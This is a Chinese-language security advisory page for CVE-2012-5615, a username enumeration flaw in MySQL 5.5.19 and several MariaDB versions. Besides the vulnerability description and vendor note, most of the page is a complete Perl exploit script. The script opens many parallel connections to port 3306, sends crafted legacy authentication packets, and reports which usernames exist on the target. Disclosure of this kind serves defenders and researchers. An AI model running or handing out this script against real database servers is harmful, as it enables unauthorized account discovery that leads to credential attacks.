发布日期:2012-12-01
更新日期:2012-12-05受影响系统:
Oracle MySQL 5.5.19
MariaDB MariaDB 5.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56766
CVE(CAN) ID: CVE-2012-5615Oracle MySQL Server是一个小型关系型数据库管理系统。MySQL 5.5.19及其他版本、MariaDB 5.5.28a、5.3.11、5.2.13、5.1.66根据是否存在用户名,生成的错误消息内容及回应时延都不同,这使得远程攻击者可以枚举有效的用户名。<*来源:Kingcope (kingcope@gmx.net)
链接:http://secunia.com/advisories/51427/
http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0005.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# MySQL User Account Enumeration Utility
# When an attacker authenticates using an incorrect password
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
# the mysql server will respond with a different message than Access Denied, what makes
# User Account Enumeration possible.
# The Downside is that the attacker has to reconnect for each user enumeration attempt
#20000 user accounts in 7 minutes
#Mon Jan 16 09:00:18 UTC 2012
#Mon Jan 16 09:07:26 UTC 2012
#root@vs2067037:~# wc -l MEDIUM.LST
#21109 MEDIUM.LST
#A usernames.txt wordlist is included in this package
#examples:
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: administrator@host
#
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: admin@host
#use IO::Socket;
use Parallel::ForkManager;
$|=1;if ($#ARGV != 1) {
print "Usage: mysqlenumerate.pl <target> <wordlist>
";
exit;
}$target = $ARGV[0];
$wordlist = $ARGV[1];
$numforks = 50;
$pm = new Parallel::ForkManager($numforks);open FILE,"<$wordlist";
unlink "/tmp/cracked";@users = ();
$k=0;
while(<FILE>) {
chomp;
$_ =~ s/
//g;
$users[$k++] = $_;
}
close FILE;
$k2 = 0;
for(;;) {
for ($k=0;$k<$numforks;$k++) {
$k2++;
if (($k2 > $#users) or (-e "/tmp/cracked")) {
exit;
}
my $pid = $pm->start and next;
$user = $users[$k2];
goto further;
again:
print "Connect Error
";
further:
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => "3306",
Proto => "tcp") || goto again;
recv($sock, $buff, 1024, 0);$buf = "x00x00x01x8dx00x00x00x00$userx00x50".
"x4ex5fx51x55x45x4dx45x00";
$buf = chr(length($buf)-3). $buf;
print $sock $buf;
$res = recv($sock, $buff, 1024, 0);
close($sock);
if ($k2 % 100 == 0) {
print $buff."
";
}
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}
unless (-e "/tmp/cracked") {
open FILE, ">/tmp/cracked";
close FILE;
print "
[*] HIT! -- USER EXISTS: $user@$target
";
open FILE, ">jackpot";
print FILE "
[*] HIT! -- USER EXISTS: $user@$target
";
exit;
}
}
$pm->wait_all_children;
}建议:
--------------------------------------------------------------------------------
厂商补丁:Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.oracle.com/technetwork/topics/security/Fortinet FortiOS (FortiGate) “conversationContext”跨站脚本漏洞Apache Tomcat 今天再爆严重安全漏洞相关资讯 MariaDB MariaDB安全漏洞 MySQL安全漏洞
- Ubuntu 16.04 Dockerfile 安装 (今 10:03)
- MariaDB 10.1.11 发布下载,MySQL (02月04日)
- MariaDB 10.0.23 发布下载 (12/21/2015 20:50:21)
| - CentOS 7.0 使用 yum 安装 MariaDB (03月03日)
- MariaDB 10.1.10 发布下载,MySQL (12/26/2015 10:55:29)
- CentOS 6.6下编译安装MariaDB-10.0 (12/21/2015 19:25:47)
|
本文评论 查看全部评论 (0)